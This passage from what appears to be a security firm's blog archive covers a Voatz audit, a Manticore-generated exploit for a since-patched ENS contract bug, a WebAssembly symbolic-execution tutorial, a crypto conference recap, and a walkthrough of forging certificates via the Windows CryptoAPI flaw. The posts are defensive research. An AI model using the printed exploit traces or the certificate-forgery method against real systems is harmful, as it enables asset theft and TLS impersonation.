Voatz has already piloted its mobile voting app with elections in West Virginia; Denver, Colorado; Utah County, Utah; and both Jackson and Umatilla Counties in Oregon. According to Voatz’ own FAQ, more than 80,000 votes have been cast on the Voatz platform across more than 50 elections since June 2016.

And yet, four security assessments that took place before ours could not quell a great deal of uncertainty and public speculation about Voatz’ implementation and security assurances.

In May 2019, researchers from Lawrence Livermore National Laboratory, the University of South Carolina, Citizens for Better Elections, Free & Fair, and the US Vote Foundation enumerated a series of questions about the security of Voatz in What We Don’t Know About the Voatz “Blockchain” Internet Voting System. They asked questions like, “Does Voatz collect voters’ location data? If so, why?” and, “How do we know that voter data cannot be retroactively de-anonymized?”

In November 2019, Senator Ron Wyden began sending letters to the National Security Agency and U.S. Department of Defense; Oregon Secretary of State Bev Clarno; and ShiftState Security. Another letter, addressed to Voatz and signed by five members of Congress (including Klobuchar, Peters, Wyden, Lofgren, and Thompson) expressed “serious concern regarding reports that there may be substantial cybersecurity vulnerabilities associated with your company’s mobile voting application.”

On February 5th, 2020—during our review period—Trail of Bits was given an anonymized, summary report of security issues in the Voatz Android mobile application externally reported to the DHS CISA. Six vulnerabilities were described, primarily related to the Android mobile application (version 1.1.60, circa September 24, 2019). One week later, the full report was made public, Voatz released a rebuttal, and a story in the New York Times was published about the security “debate” surrounding Voatz.

Trail of Bits enters the fray…

In December 2019, Trail of Bits was hired by both Voatz and Tusk Philanthropies, an organization that funded municipalities election costs for Voatz’s pilots, to conduct the most complete security assessment of the platform to date.

To the best of our knowledge, no assessment prior to ours had been scoped to include the discovery of Voatz Core Server and backend software vulnerabilities.

Trail of Bits was provided over 168,000 lines of pure source code across approximately 2,100 files. This did not even constitute the entire Voatz system, as the code for certain components such as the audit portal were never furnished. The system is unusually complex, with an order-of-magnitude more custom code than similar mobile voting systems we have assessed.

Highlights of our Findings

Our Voatz security report is divided into two volumes:

  1. The security assessment’s technical findings (Volume I)
  2. A threat model containing architectural and operational findings (Volume II)

Our security review resulted in seventy-nine (79) findings: forty-eight (48) technical and thirty-one (31) in the threat model. A third of the findings are high severity, another third medium severity, and the remainder a combination of low, undetermined, and informational severity. The high-severity findings are related to:

  • Cryptography, e.g., improper use of cryptographic algorithms, as well as ad hoc cryptographic protocols.
  • Data exposure, e.g., sensitive credentials available to Voatz developers and personally identifiable information that can be leaked to attackers.
  • Data validation, e.g., reliance on unvalidated data provided by the clients.
  • Audit logging and accountability controls, e.g., the inability to track commands issued by administrators.
  • Security assessment and authorization controls, e.g., insufficient continuous monitoring, documented procedures, and documented connections.
  • Configuration management controls, e.g., a lack of baseline configurations and security impact analyses.
  • Contingency planning, e.g., insufficient plans for disaster recovery and business continuity.
  • Insufficient incident response, component interconnection, maintenance, and risk assessment plans and protocols.

Our technical report includes Appendix B, containing an independent analysis of not only the MIT report, but five prior assessments of Voatz. The Security Properties and Questions section of the report also answers as many questions as possible from the What We Don’t Know About Voatz paper. For example, we describe how “anonymous IDs” are assigned to ballots, whether SIM swapping is sufficient to steal a voter’s account, and how voters are uniquely identified when requesting a receipt.

What’s been fixed

On February 26, 2020, Trail of Bits reviewed fixes proposed by Voatz for the issues presented in the technical report (Volume I). Each finding was re-examined and verified by Trail of Bits. We found that Voatz had addressed eight (8) issues and partially addressed six (6) issues; thirty-four (34) technical issues remain unfixed, at the time of writing.

See a detailed review of the current status of each issue in Appendix E: Fix Log of the technical report. The Fix Log was further updated on March 11th with responses from Voatz indicating their plans to address additional findings.

So, what does it all mean?

Voatz’s code, both in the backend and mobile clients, is written intelligibly and with a clear understanding of software engineering principles. The code is free of almost all the common security foibles like cryptographically insecure random number generation, HTTP GET information leakage, and improper web request sanitization. However, it is clear that the Voatz codebase is the product of years of fast-paced development. It lacks test coverage and documentation. Logical checks for specific elections are hard-coded into both the backend and clients. Infrastructure is provisioned manually, without the aid of infrastructure-as-code tools. The code contains vestigial features that are slated to be deleted but have not yet been (TOB-VOATZ-009). Validation and cryptographic code are duplicated and reimplemented across the codebase, often erroneously (TOB-VOATZ-014). Mobile clients neglect to use recent security features of Android and iOS (TOB-VOATZ-034 and TOB-VOATZ-042). Sensitive API credentials are stored in the git repositories (TOB-VOATZ-001). Many of its cryptographic protocols are nonstandard (TOB-VOATZ-012).

The quantity of findings discovered during this assessment, the complexity of the system, and the lack of access to both a running test environment as well as certain codebases leads us to believe that other vulnerabilities are latent.

What’s next?

Broadly, we believe election officials themselves should fund qualified, public reviews of these systems, and specify that those reviews describe the issues and solutions in a way that non-technical audiences can understand. It’s easy to get confused by non-commissioned reports; for example, an August 2019 report by The National Cybersecurity Center (NCC) seemed to address the platform’s security issues, but the NCC doesn’t employ any security experts. Their report validated that Voatz’ features and operation meet the needs of the user, not that the Voatz system is secure.

We hope that our assessment will improve the overall security posture of the Voatz system, but there is still a great deal of work to be done to achieve that goal. The door is open to continue to help Voatz remediate the issues we discovered.

Meanwhile, as we continue working in election security, we are taking the initiative to help companies incorporate more security knowledge earlier into the development process.

Elect security with us.

See something you need? We have staff who specialize in election security issues, including cryptographic, blockchain, and technical security experts. Contact us to see how we can help.

See responses from Tusk Philanthropies and Voatz to the publication of this report.

Manticore discovers the ENS bug

The Ethereum Name Service (ENS) contract recently suffered from a critical bug that prompted a security advisory and a migration to a new contract (CVE-2020-5232). ENS allows users to associate online resources with human-readable names. As you might expect, it allows you to transfer and sell domain names.

Figure 1: Sam Sun (samczsun) discovered a critical vulnerability in ENS

Figure 1: Sam Sun (samczsun) discovered a critical vulnerability in ENS

Specific details about the bug were in scant supply. We heard about the forthcoming fix and wondered: Could Manticore have found this bug?

In short, if a person transferred an ENS name in a specific way, they would be capable of later claiming it back away from the new owner. This would not have worked if a person transferred a name in the normal way. In other words, to make use of this bug, the person doing the transferring had to have been intentionally setting themselves up from the beginning to claim it back.

We decided to dive in and try Manticore on the original contract and discover the bug.

  1. Go to etherscan.io and dig out the contract code.
  2. Scratch our heads while observing the strange Solidity dialect.
  3. Realize it’s not Solidity at all. It was written in LLL.

Luckily, Manticore does not rely on any high-level language and can inspect code at the EVM level. So we backpedaled a bit and found the creation transaction that gave birth to the ENS contract. After some clever use of etherscan.io magic, we found the transaction and extracted the initialization bytecode:

Figure 2: Etherscan shows the initialization bytecode as Input Data

From the advisory, we inferred that the bug could be exploited through four transactions:

  1. The attacker buys a name or ENS node
  2. The attacker does some unknown exploitation preparatives
  3. The attacker sells the name/node/subnode to the victim
  4. The attacker expropriates the name/node and regains ownership over the node

The unknown bits occur during steps 2 and 4. If we setup the scenario appropriately, then Manticore should discover the precise actions required for these steps on its own.

We reviewed the exported functions by inspecting the contract code:

;; Precomputed function IDs.
  (def 'get-node-owner 0x02571be3) ; owner(bytes32)
  (def 'get-node-resolver 0x0178b8bf) ; resolver(bytes32)
  (def 'get-node-ttl 0x16a25cbd) ; ttl(bytes32)
  (def 'set-node-owner 0x5b0fc9c3) ; setOwner(bytes32,address)
  (def 'set-subnode-owner 0x06ab5923) ; setSubnodeOwner(bytes32,bytes32,address)
  (def 'set-node-resolver 0x1896f70a) ; setResolver(bytes32,address)
  (def 'set-node-ttl 0x14ab9038) ; setTTL(bytes32,uint64)

This information was enough to set up the preconditions for the vulnerability in a Manticore script and let its symbolic execution produce the exploit for us, automatically:

Figure 3: Manticore automatically discovers an exploit for ENS

In just a few minutes, Manticore found two ways to expropriate back the subnode and, therefore, exploit this vulnerability.

If you inspect the generated exploits, you can see the attacker needs to send a setTTL or setResolver transaction before she sells the bait node to the victim. Here are the two complete exploit traces:

[+] Accounts in the emulated ethereum world:
     The contract address: 3c90ec8304b1da72f2e336d19336e9046d71e981
     The owner address: d77e14a2801273ab0a1da75f43585d3e32f0bd1d
     The attacker address: 911c639393f0ca8eed3a1dbebf740053b7fb8ce8
     The victim address: a21337d4001af93c16ee19b8ebb210b714ed92bb
[+] ENS root owner gives the attacker 'tob' sub node
[+] Let the attacker prepare the attack. Manticore AEG.
[+] The attacker `sells` the node to a victim (and transfer it)
[+] Now lets the attacker finalize the exploit somehow. Manticore AEG.
[+] Check if the subnode owner is victim in all correct final states.

[*] Exploit found! (The owner of subnode is again the attacker)
     setSubnodeOwner(0x0, 0x2bcc18f608e191ae31db40a291c23d2c4b0c6a9998174955eaa14044d6677c8b, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     setTTL(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     setOwner(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc, 0xa21337d4001af93c16ee19b8ebb210b714ed92bb)
     setResolver(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b21c, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     owner(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc)

[*] Exploit found! (The owner of subnode is again the attacker)
     setSubnodeOwner(0x0, 0x2bcc18f608e191ae31db40a291c23d2c4b0c6a9998174955eaa14044d6677c8b, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     setResolver(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     setOwner(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc, 0xa21337d4001af93c16ee19b8ebb210b714ed92bb)
     setTTL(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1dc, 0x911c639393f0ca8eed3a1dbebf740053b7fb8ce8)
     owner(0xbb6346a9c6ed45f95a4faaf4c0e9859d34e43a3a342e2e8345efd8a72c57b1fc)

The API of the new ENS implementation has changed significantly and these exploits are no longer applicable. This new code has been reviewed by other parties, however, contract owners should always build tests for important security properties into their development process. It is left as an exercise for the reader to write a Manticore script that verifies the new contract is safe from similar issues.

Success!

Manticore helps you reason about code, test security properties, and generate exploits with very little knowledge of the contract’s inner workings. I personally find this example with ENS interesting because the contract is not written in Solidity and it highlights Manticore’s ability to handle low-level EVM.

Review our “Building Secure Contracts” to learn more about using Manticore. It includes tutorials on symbolic execution, instructions for using Manticore, and techniques to maximize its bug finding capabilities. We’re also available to help you integrate our tools into your development process: Contact us or join the Empire Hacking Slack.

As of March 3rd, ENS finished their contract migration and published a port-mortem of this incident.

Symbolically Executing WebAssembly in Manticore

With the release of Manticore 0.3.3, we’re proud to announce support for symbolically executing WebAssembly (WASM) binaries. WASM is a newly standardized programming language that allows web developers to run code with near-native performance directly within the browser. Manticore 0.3.3 can explore all reachable states in a WASM program, and derive the concrete inputs that produce a given state. Our goal with this feature is to provide a solid foundation for security analysis of WASM programs in the future.

Why WASM?

WASM is becoming an important part of the way software is written. It’s supported by all major web browsers and was recently accepted as a web standard. What’s more, it may help bridge the performance gap in web/native applications, and ease their development by allowing developers to work in familiar languages like C++ and Rust.

One exciting WASM development is the Bytecode Alliance: a proposal from Mozilla to restructure modern package management around small, well-verified WASM nanoprocesses that can be formally shown to have no significant security vulnerabilities. Symbolic execution is uniquely well suited to such problems because it’s designed to evaluate code under all possible conditions. And yet, until now, no significant strides have been made towards symbolically executing WebAssembly. To our knowledge, Manticore is the first actively-maintained symbolic execution engine to support WASM binaries.

Ethereum WASM (EWASM)

WASM is also poised to have a positive impact on our Ethereum smart contract analysis work. As part of the Ethereum 2.0 improvements, the Ethereum foundation plans to replace the Ethereum Virtual Machine (EVM) language with Ethereum-flavored WebAssembly (EWASM). EWASM will look somewhat different from regular WASM, but we think that having some experience developing WASM tools will make it easy to upgrade our existing EVM tools when the transition does take place.

Using WASM in Manticore

Let’s look at a classic example of a problem one might solve with symbolic execution. We’ll use Manticore to solve a simple crackme that’s been cross-compiled to WebAssembly.

We start with the following C program. It reads in a single byte from stdin, then checks it against a concrete value. It does so bit by bit, so we can’t simply read the value from the source code. It also includes a branch counter that increments after each bit is checked so the return code will reflect how many of the leading bits matched the expected value. This also prevents the compiler from optimizing the nested if statements into a single comparison.

image7Figure 1: A C program that performs a bitwise comparison to a byte from stdin

Since this is just an example, you can probably figure out from the source code that the correct input byte is 0x58 (‘X’). Let’s compile this into WebAssembly using WASMFiddle, then put it into Manticore and see if it can find the same result.

First, we’ll import the Python modules we need to work with WASM:

image6Figure 2: Python import statements

Since WASM binaries are run within a browser, they don’t have access to the standard library in the same way that native binaries would. Instead, functions like getchar or printf would usually be provided in JavaScript by Emscripten or WASI. Here, we’ll provide a minimal symbolic implementation using the Manticore API:

image3Figure 3: Symbolic getchar implementation

Though the C program expects an 8-bit integer from getchar, the smallest WASM data type is a 32-bit integer. For this reason, instead of returning an 8-bit value, we return a 32-bit value and constrain it to be between 0 and 256.

We’ll also need a callback that runs upon state termination and checks whether we found the correct answer. We’ll use a Manticore plugin to do this:

image2Figure 4: Callback that identifies successful states

This callback checks if the value on top of the stack (the return value from main) is zero, and if so, solves for the concrete values of all the symbols in this state.

Finally, we’ll put everything together. We create a new Manticore instance and give it the name of our WASM module and our symbolic getchar implementation. We register the state termination callback, then tell Manticore to begin state exploration starting from the main method.

image5Figure 5: Python statements to run Manticore

Here’s the final script:

image1Figure 6: Manticore solution script

When we run this, we can see that Manticore correctly solves for the input byte:

image4Figure 7: Terminal output showing ‘X’ returning 0

Try it out

You can try out WASM support in Manticore right now by installing the 0.3.3 release from PyPi. WASM support is still in alpha, so please help us make it better by filing bug reports or suggestions as issues on our Github repository. The API may change slightly as we make usability improvements, but we’ll make sure the Github versions of the examples shown above stay up to date. One final thing to note: Manticore’s WASM module doesn’t currently support symbolic floating point semantics, and only has limited support for symbolic memory dereferences. These haven’t been a problem for us so far, but we’re working on them in order to make Manticore the best tool it can be.

We’re always developing ways to work faster and smarter. Need help with your next project? Contact us!

Themes from Real World Crypto 2020

Over 642 brilliant cryptographic minds gathered for Real World Crypto 2020, an annual conference that brings together cryptographic researchers with developers implementing cryptography in the wild. Overall, RWC 2020 was an impressive conference that demonstrated some amazing work. Here we explore three major themes that emerged:

  1. Crypto bugs are everywhere...Whether it’s a somewhat unsurprising Bleichenbacher attack on TLS, or cryptographic side-channel attacks on (supposedly) secure hardware, there are a lot of cryptographic vulnerabilities out there. This became abundantly clear this past week.
  1. …so we need more cryptographers on projects…When designing, implementing, and reviewing cryptographic systems, the more cryptographers involved, the better. RWC 2020 featured big examples of how well collaboration can work, and how badly important systems can fail without it.
  1. …but cryptographic capabilities are growing fast! Advanced cryptography is becoming more practical, as shown by new multi-party computation frameworks and improvements to ZK-proofs. Plus we saw exciting new applications in Apple’s Find My protocol for finding offline devices, message authentication for satellites to prevent spoofing, and more.

Let’s dig in! 

1. Crypto bugs are everywhere

Traditional attacks

Yet another Bleichenbacher attack was presented: The 9 Lives of Bleichenbacher’s CAT:

New Cache ATtacks on TLS Implementations. (Which brings us to a fourth theme: Cryptographers still love using tortured puns and silly acronyms.) The attack leverages Bleichenbacher’s attack on PKCS#1 v1.5 padding for RSA key exchanges. Specifically, the attack takes advantage of the fact that many companies reuse certificates across multiple servers, so the Bleichenbacher attack can be parallelized and thus completed before the 30-second session timeout occurs. 

Unfortunately, this insecure padding scheme is still supported by ~6% of the internet; further, a man-in-the-middle downgrade attack can be performed, so any server that supports a vulnerable implementation can be broken 100% of the time (and this works even if the client does not support RSA key exchange).

Another talk, SHA-1 is a Shambles, discussed a chosen-prefix collision on SHA-1, and showed that SHA-1 can now be attacked in practice with affordable hardware.  The authors used this vulnerability to perform an impersonation attack on PGP. This project was the culmination of several years of work, with theoretical attacks discovered in the early 2000s, and the first practical attack found in the 2017 paper, SHAttered. In other words, SHA-1 shall never be used again (ok, coming up with puns is harder than it looks). 

Other attacks

Two different attacks on secure hardware were presented at RWC: one on a hardware security module (HSM) and another on a trusted platform module (TPM). The first attack targeted a specific HSM model and was able to (among other things) perform arbitrary code execution and decrypt all secrets. Although the attack itself was not heavily cryptographic, the talk demonstrated (yet again) that we cannot necessarily trust that our cryptographic secrets will be safe on HSMs. The second talk combined a timing side-channel attack with a lattice attack on ECDSA to recover the private signing key, demonstrating that TPMs are unfortunately not side-channel resistant.

Meanwhile, “Pseudorandom Black Swans: Cache Attacks on CTR DRBG” demonstrated that random number generators are also vulnerable to side-channel attacks. The cache attack leverages two problems with CTR_DRBG: Keys are not rotated fast enough, and adding more entropy is optional (and chosen by the API caller). This means keys can be compromised, and if inadequate entropy is used, an attack can then obtain all future states. These attacks were not a part of the previous standard’s threat model; fortunately, FIPS 140-3 updates this threat model.

2. The case for more cryptographers

From all of these attacks, the lesson is to involve more cryptographers and think about a variety of threat scenarios when designing your system (and in the case of the last talk, use Hash_DRBG). Several RWC 2020 presentations confirmed this. For instance, we saw how CRLite, a scalable system for TLS revocations, was achieved through academic and industrial collaboration. On the other hand, two different cryptographic reviews of e-voting systems and an analysis of the handshake protocol in WPA3 showed the dangers of too few cryptographic cooks.

The good

CRLite, the system for TLS revocations, started as an academic design and Firefox extension proof of concept; from there industry improved on the scheme, taking into account infrastructure that exceeded the means of academia alone. Now there is a working prototype and development is progressing while academia continues to refine the protocol.

More promising news came from model-checking 5G security: Our tools are sufficiently advanced that standardization now can and should be accompanied by formal models and analysis. This idea was pioneered by the symbolic analysis of TLS 1.3, and it’s great to see the trend continuing. These types of analysis are very powerful for protocols and standards, as they ensure that security goals are clearly stated and achieved by the protocol. 

In the case of 5G, the security goals were not clearly stated in the initial conception of the protocol. The RWC 2020 presentation, “A Formal Analysis of 5G Authentication,” specified the security goals more clearly, which led to the discovery that 5G does not achieve untraceability (perhaps this is bad after all!). Nevertheless, this work serves as an important demonstration and should be replicated for future standardization efforts.

The bad

“Dragonblood: Analyzing the Dragonfly Handshake of WPA3 and EAP-pwd” makes a pretty compelling case for involving cryptographers in protocol design. WPA2 is vulnerable to offline dictionary attacks, and WPA3 was proposed as the improvement. However, Dragonblood found that WPA3 is vulnerable to side-channels, and, according to the authors of the paper, “WPA3 does not meet the standards of a modern security protocol.” To make matters worse, the countermeasures are costly and may not be adopted. Worst of all, as the authors state, these issues could have been avoided if the protocol design process was open to more cryptographers.

The ugly

There’s plenty of ugliness in the world of e-voting, as the talks at RWC 2020 confirmed. In one analysis of the Moscow internet voting system, two significant breaks to the encryption scheme were found within a somewhat constrained time frame. For example, the first break resulted from an insecure variant of ElGamal dubbed “Triple ElGamal,” which attempted to achieve 768-bit security, but actually achieved three separate instances of 256-bit security, which can be broken in under 10 minutes using CADO-NFS

Both breaks cited were fixed; however, the fixes to the second break were published only two days before the election, and the technology was still deployed. The general impression of the presenter was that the voting scheme achieved no privacy, very partial verifiability, no coercion resistance, and no protection against vote-buying. Although the Russian government should be commended for opening their source code, it is clear that more cryptographers should have been involved in this entire process.

Similar work on the Switzerland internet voting system led to the discovery of some significant cryptographic bugs. The protocol uses a zero-knowledge proof system to achieve both privacy and verifiability; however, due to a flaw in their Fiat-Shamir transformation, none of the zero-knowledge proofs were sound. Further, parameters were generated incorrectly in a way that could allow for votes to be modified. Even worse, statements were malformed for their zero-knowledge proofs, which broke their security proofs. This result is not ideal. However, to be fair, it is great to see cryptographers involved, as critical issues were spotted before deployment in Switzerland (and revealed similar issues to non-public systems in other countries).

3. New growth and cryptography applications

It’s not all bad; our cryptographic capabilities are growing quickly! And RWC 2020 displayed some fascinating efforts to apply cryptography to real world problems.

“Find My” cryptography

Earlier this year, Apple released a new “Find My” feature in iOS 13 that allows offline devices to be located while protecting privacy of both the owner and the finder of the device. Previously, similar features like “Find My Phone” required the device to be online, a serious limitation, particularly for devices like MacBooks which are typically offline. The cryptography behind this feature was presented at RWC 2020. Apple sought a protocol that achieved the following goals: 

  • Only the owner of the device can track the device and access location reports remotely
  • Previous locations of the device are protected if the device is compromised 
  • Owners only receive anonymous information from the finder  
  • The finder’s location is never revealed to others (including the server) 

To achieve this, the protocol calls for offline devices to broadcast public keys via Bluetooth. Active devices become “finders,” and when other offline devices are discovered via Bluetooth, the finder encrypts its location using the offline device’s public key and sends it to the cloud. This way, even the server does not know the location—however, IP-based information does leak to the server, and Apple’s only promise is that they do not store logs of this information.

The owner can then access the time and location of their offline device whenever there is an active device in its vicinity. (There are more subtleties to the protocol to achieve the remaining security goals, such as key rotation). In summary, Apple specified rigorous security and privacy goals, and constructed a novel design in their attempt to achieve them.

Private detection of compromised credentials

Protocols for Checking Compromised Credentials” presented a formal security analysis of two protocols for checking compromised credentials: HaveIBeenPwned (HIBP) and Google Password Checkup (GPC). These protocols aim to alert users if their credentials have been breached and shared across the web. GPC maintains an active database of username and password pairs for users to query. HIBP, on the other hand, only maintains passwords. 

Since these databases contain hundreds of millions of records, both protocols implement a bucketization strategy, where hash values corresponding to records are sorted into buckets, based on their hash prefix. This allows users to query the database with a hash prefix, receive a bucket of hash values, and check if their credentials have been compromised, without revealing their entire hash of their secret to the server. The study presented at RWC 2020 demonstrated that each protocol leaks noticeable information about user secrets due to their bucketization strategies—both protocols leak information for different, subtle reasons. Luckily, the study also produced mitigation strategies for both protocols.

Out of this world cryptography

RWC even included some cryptographic applications that are out of this world. Galileo is a global navigation satellite system (like GPS) used by the European Union. As discussed at RWC, these navigation systems are a critical part of our infrastructure, and spoofing location is actually fairly easy. Luckily, so far, this spoofing is mostly used for playing Pokemon Go; however, spoofing attacks on these satellite systems are real. To protect against potential future attacks, Galileo will offer a public navigation message authentication service.

Banking on collaboration

The final talk at RWC discussed using multi-party computation to detect money laundering. Financial regulators impose large fines on banks if they allow money laundering activities, so these banks are incentivized to detect illegal activities. However, collaboration between banks is difficult because transaction data is private. Fortunately, multi-party computation can facilitate this collaboration without violating privacy. Overall, this effort achieved promising results by applying a graph-based approach for modeling transactions and algorithms specialized for multi-party computation for efficient, collaborative analysis between various banks.

Conclusion

RWC 2020 made it clear that involving cryptographers in the design and implementation of your novel protocols will save you both time and money, as well as keeping everyone safer. If you’re involved in this type of work encourage everyone involved to open-source your code, publish your protocols for review, and hey, talk to the Trail of Bits cryptography team!

Exploiting the Windows CryptoAPI Vulnerability

On Tuesday, the NSA announced they had found a critical vulnerability in the certificate validation functionality on Windows 10 and Windows Server 2016/2019. This bug allows attackers to break the validation of trust in a wide variety of contexts, such as HTTPS and code signing. Concerned? Get the important details and see if you’re vulnerable at https://whosecurve.com/. Then come back to this tab and keep reading to see exactly what this bug is and how it works.

image (7)

Why even patch if it doesn’t have a logo? https://whosecurve.com

At a high level, this vulnerability takes advantage of the fact that Crypt32.dll fails to properly check that the elliptic curve parameters specified in a provided root certificate match those known to Microsoft. Interestingly, the vulnerability doesn’t exploit any mathematical properties unique to elliptic curves – the same exact bug could have manifested itself in a normal DSA signature verification library. So let’s first review how this bug would have worked if Crypto32.dll used normal DSA.

A toy version of the attack

The security of DSA relies on the fact that the discrete log problem is hard when dealing with the group of integers mod a prime. Consider the following equation:

b = gx mod p

It’s hard to find x if all you know is p, g, and b. To set up DSA, users need to specify a prime p and a generator g. Using these two parameters, they can then create a private key x and public key pk = gx mod p. These keys allow for signatures that can only be created by the private key, but can be verified with the public key. Signature forgery is then as hard as the discrete log problem (very hard).

Digital signatures algorithms such as DSA aren’t very useful on their own, though, since they don’t provide a mechanism by which users can trust a given public key associated with a specific entity. This is where X.509 certificates come into play. An X.509 cert is a file that explicitly says “this public key belongs to this person,” signed by someone else (possibly the owner of the public key in question). These certificates can be chained together, starting at a “root” certificate, attesting to the identity of a root certificate authority (CA). The root CA signs intermediate certificates to attesting the identity of intermediate CAs, the intermediate CAs sign other intermediate certificates; and so on, down to the “leaf” certificate at the end.

Each certificate contains information about the signature algorithm and parameters used. Microsoft’s certificate might look like the following (heavily simplified) example:

  • Certificate authority: Microsoft
  • Name: Trail of Bits
  • Public key info
    • Algorithm: DSA
    • Generator: g
    • Prime: p
    • Public key: pk

When Windows users receive a X.509 certificate chain, they check to make sure the CA at its root is one that Microsoft trusts. But what happens if Windows only checks to make sure the public key of the certificate in question matches a trusted entity, not the associated system parameters? In other words, what happens when an attacker can change the value of p or g associated with a given public key pk without Windows noticing? In fact, omitting this check completely breaks the security of DSA.

One potential way to exploit this vulnerability is to simply set g = p and make the private key x = 1. This allows the attacker to sign any message as if they were the legitimate owner of pk, since they now know the private key (it’s 1). Things can get even more interesting, though: Instead of simply setting the new generator to the target’s public key, we can choose a new private key y and set the malicious generator to be g’ = y1 * pk. This means the certificate still effectively has a secret key, but it is known only to the attacker, not the original issuer.

Importantly, this attack works without anyone solving the discrete log problem. Essentially, if the authenticity of parameters associated with a given public key is not established, the attacker can choose any private key they want. This exploit scenario was originally outlined in 2004 by Vaudenay and referred to as a domain parameter shifting attack, but wasn’t seen in the wild until now.

The actual vulnerability

Exploiting the vulnerability in Crypt32.dll involves adapting the previous attack so that instead of using DSA, the signer is using the elliptic curve variant ECDSA. In fact, you don’t really need to know much about elliptic curves at all to understand how this works. You need only know elliptic curves are more or less mathematically equivalent to the integers mod p, except instead of multiplying numbers, you geometrically manipulate points lying on a curve. In this post, curve points are bold upper case letters and adding a point P to itself n times is written as n * P

ecc

Fig 1. The diagram you’ve seen a million times showing elliptic curve addition

Elliptic curves, along with point addition, create another structure in which the discrete log problem is hard. Also, like the normal DSA case, ECDSA requires choosing a set of public parameters before generating a private/public key-pair, including a generator. Usually these parameters are specified by naming a curve, such as Elliptic Curve secp256r1 (1.2.840.10045.3.1.7), but users can manually specify them instead. In that case, users must supply constants that define the elliptic curve (A,B), the prime over which arithmetic is done p, the generator of the group G, and information about that group’s size (order, cofactor). For the purposes of this attack we only care about G.

Now that we have some background on elliptic curves, it’s not hard to see that the attack works basically the same as with DSA: Change the parameters specifying ECDSA to have a generator corresponding to a private key you know, but with the same public key as the certificate authority you’re trying to spoof. By editing the parameters, we can control the effective secret key for the certificate, and use it to attest to whatever identities we’d like.

In real life, the parameter validation bypass is also slightly more involved. Microsoft does check that the parameters used in most certificates are valid, but when it is presented a root certificate it has cached, it will skip parameter validation if the certificate uses elliptic curve cryptography and the public key matches what’s cached. This means that for common root CAs, which most users will have seen, our attack is viable. In practice, this means we can generate valid TLS certificates for almost any website, bypass code signing restrictions, or forge signatures for files and emails. For explanatory purposes, let’s look at how we might man-in-the-middle https traffic to some website.

Building a fake certificate

First we need to pick a trusted root certificate. Microsoft maintains a list here. For our purposes, we picked the Microsoft EV ECC Root Certificate Authority 2017. This is a secp384r1 cert, so the public key is a point on the curve defined by the parameters given by the secp384r1 curve.

carbon (12)

Fig 2. A trusted certificate with public key

Next we need to generate a new private key for our malicious certificate, defined over a different curve, using explicit parameters. This object has a specific ASN.1 key encoding, which we generate with OpenSSL. Remember from the previous section, we want to hold the public key the same as the private one to bypass validation. Once we have the public and private keys for our new certificate, we can use them to calculate a generator such that they correspond. More precisely, we need to calculate G’ = x-1 * P where x is our private scalar and P is the public key point from the MS certificate (this corresponds to the second attack scenario in the previous section).

Now that we have a new mutated key, we can use this to generate a CA certificate:

carbon (11)

Fig 3: A parsed view of our bad root

Once we’ve generated that certificate we can use it to sign a leaf certificate for whatever we want. This key/cert is just signed by the “bad” root – it doesn’t need custom parameters or any magic.

cert

Fig 4: A cert for whosecurve.com

Finally, we ensure that we send the “full chain” as part of a TLS connection. In normal TLS you send the leaf certificate along with any intermediates, but you don’t send the root itself. In this case we need to send that root to trigger the cache bug. Voila!

image (6)

Fig 5. Not a real TLS certificate

Fixing the vulnerability and lessons learned

Fortunately for Microsoft, fixing this bug simply required adding a couple of checks during signature verification to make sure ECDSA parameters are authentic. Unfortunately for everyone else, this vulnerability is absolutely devastating and requires all systems running Windows 10 to be patched immediately. Until it is, attackers can forge signatures for TLS, code, files, or email.

Cryptographically, this bug is a great example of how increasing the number of parameter choices increases system fragility. We’ve known for years that explicitly specified curves (as opposed to named curves) are a bad idea, and this is yet another piece of evidence to that point. It also is a great reminder that all cryptographic information needs to be verified when handling digital signatures.

While we have not provided a PoC for this we strongly encourage people to patch since public exploit code has become available today! And we have put up a website demonstrating the flaw for anyone interested in checking whether they have an unpatched system: Go find out Whose Curve Is It Anyway?

References:

Mainnet360: joint economic and security reviews with Prysm Group

On Monday, October 28th at the Crypto Economics Security Conference, Trail of Bits announced a new joint offering with Prysm Group: Mainnet360. Carefully designed to produce a comprehensive assessment of the security and economic elements of blockchain software, Mainnet360 gives teams a broader perspective that will allow them to build safer and more resilient systems.

The short story: Mainnet360 makes sure a system’s actual deployed code is both correct and economically efficient. These systems are secure only through a complex interaction of economics and computer science; implementation errors in either allow value to be stolen or destroyed. This kind of multidimensional problem is exactly the kind of work we specialize in.

How it works

Since the original Bitcoin whitepaper, decentralized systems have built on a notion of economic security. To avoid having a single privileged administrator, the incentives must be aligned for network participants to maintain the system cooperatively. Realizing this vision requires both a sound incentive model and code that faithfully implements it; errors in either the model or the code can lead to total system collapse.

Mainnet360 clients will receive a comprehensive review of both the economic framework that drives their system and the code with which it is implemented. We will work closely with teams to identify and remove risks, architect future work, and find the ideal technical solutions for tricky economic constraints. Building stable decentralized systems requires a broad set of experts cooperating closely, and we’re proud to offer that in a convenient package.

Our offering extends beyond just design review. Trail of Bits specializes in delivering clients new testing and verification tools, too. Now with Prysm Group’s input, we can extend this tooling further to verify economic properties. Our comprehensive understanding of the risks present in the systems we review means that we can deliver more architectural guidance. Lists of bugs are useful, but strategic guidance to eliminate bug classes puts more power in your hands.

The partnership

Mainnet360 has been in the works for months. After being introduced by DARPA at the Applications and Barriers to Consensus Protocols workshop in February where Prysm Group presented their research on “Designing the market for blockchain nodes,” our teams were struck by the similarity in our assessment processes. Despite our wildly different expertise, we found that we deliver similar advice in similar formats to some of the same clients. We also quickly realized that our skillsets were highly complementary.

